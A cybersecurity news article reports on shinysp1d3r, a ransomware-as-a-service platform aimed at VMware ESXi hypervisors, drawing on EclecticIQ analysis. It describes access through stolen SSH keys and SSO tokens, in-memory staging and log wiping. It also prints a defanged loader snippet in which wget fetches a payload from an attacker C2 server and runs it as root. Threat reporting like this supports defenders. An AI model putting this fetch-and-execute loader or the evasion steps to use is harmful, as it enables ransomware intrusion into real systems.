Cyber Security News

New ‘shinysp1d3r’ Ransomware-as-a-service in Active Development to Encrypt VMware ESXi Environments

Emerging in mid-2025, the shinysp1d3r ransomware-as-a-service (RaaS) platform represents the next evolution of cloud-focused extortion tools.

Unlike traditional ransomware that targets Windows endpoints or network file shares, shinysp1d3r is engineered specifically to infect and encrypt VMware ESXi hypervisors and their attached datastores.

Early deployments have demonstrated a two-stage payload delivery: initial access is gained through compromised SSO credentials or SSH keys, followed by a secondary module that spreads laterally across ESXi clusters.

Victims report that once deployed, the ransomware enumerates all running virtual machines, disables snapshot functionality, and begins simultaneous AES-256 encryption of each VMDK file.

Data extortion message (Source – EclecticIQ)

The project’s control panel offers affiliates granular options to tailor the encryption process by selecting datastores, specifying file extensions to target, and configuring network throttling to evade detection.

Affiliates can monitor real-time progress and negotiate ransom terms using an integrated chat widget.

While still under active development, shinysp1d3r has already drawn interest from multiple underground forums due to its streamlined management interface and robust error-handling routines, which ensure that partial encryptions can resume automatically after service interruptions.

EclecticIQ analysts observed that shinysp1d3r is poised to leverage existing ShinyHunters infrastructure and affiliate networks to rapidly expand its victim base once matured.

Functionally, shinysp1d3r’s architecture consists of a lightweight loader and a full-featured encryption daemon.

ShinyHunters team and connection with Scattered Spider (Source – EclecticIQ)

The loader is a position-independent shell script that infects ESXi hosts via SSH or API calls, stages the daemon in memory, and triggers execution, all without writing files to disk.

The daemon then mounts each datastore with exclusive locks, suspends any running VMs to capture consistent snapshots in memory, and executes an embedded Go-based encryption binary.

This binary employs concurrent worker threads to maximize throughput and avoid triggering hypervisor performance alerts.

Infection Mechanism

Affiliates typically initiate infections by harvesting SSH keys from misconfigured management servers or by abusing stolen SSO tokens obtained through vishing attacks.

Once authenticated, the loader script is deployed using the ESXi host’s built-in busybox shell. It checks for required privileges, then fetches the main ransomware payload from a C2 server over HTTPS.

AI Voice Agent workflow in Vishing campaigns (Source – EclecticIQ)

The following snippet illustrates the loader’s core logic:-

#!/ bin/ sh
# shinysp1d3r loader for ESXi
C2 = "https[:]//srv[.]affiliateshinysp1d3r[.]com/payload"
TMP = "/tmp/[.]shinyloader"
wget - qO "$TMP" "$C2" && "chmod" + x "$TMP"
# Execute in memory
$TMP --esxi-user root --esxi-pass "$ {ESXI_PASS}"

After execution, the loader cleans up logs to remove audit traces and disables syslog forwarding to external servers. The daemon then iterates through each datastore path under /vmfs/volumes, locks files using ESXi’s VOMA API, and applies encryption in place.

By leveraging the hypervisor’s local file locking, shinysp1d3r ensures that no virtual disks can be modified or rolled back, forcing victims to either restore from offline backups or pay the ransom.

Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Google Chrome 153 Update Fixes 42 Security Flaws, Including 3 Critical Ones

Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…

4 hours ago

CISA and NIST Release Technical Checklist for Safeguarding Identity Tokens From Theft and Misuse

The Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute of Standards and Technology…

14 hours ago

CISA Shares 17 Techniques Used by Hackers to Compromise Active Directory Environments

CISA and five international cybersecurity agencies have released detailed guidance describing 17 common techniques hackers…

15 hours ago

Apple Rolls Out Massive Security Update Fixing 273 Vulnerabilities Across Its Devices

Apple has released one of its largest coordinated security rollouts, addressing 273 distinct critical vulnerabilities…

15 hours ago

How to Keep Malware’s Rotating Infrastructure From Becoming a Detection Gap

You can’t detect today's attacks with yesterday’s threat intelligence; that’s how you could briefly formulate…

15 hours ago

Microsoft Bans Its AI Models From Launching Cyberattacks or Escalating Their Own Access

Microsoft has published a draft Humanist AI Code of Conduct that would prohibit its in-house…

15 hours ago